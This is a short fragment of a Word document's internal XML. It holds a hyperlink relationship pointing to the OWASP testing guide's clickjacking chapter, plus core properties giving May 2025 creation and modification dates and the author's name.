Target="https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking.md" TargetMode="External" Id="R866f9de67fbd46e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2025-05-04T17:08:44.7667253Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-20T00:08:24.7805341Z</dcterms:modified>
  <dc:creator>Rafiea Nusrat Mim</dc:creator>
  <lastModifiedBy>Rafiea Nusrat Mim</lastModifiedBy>
</coreProperties>
</file>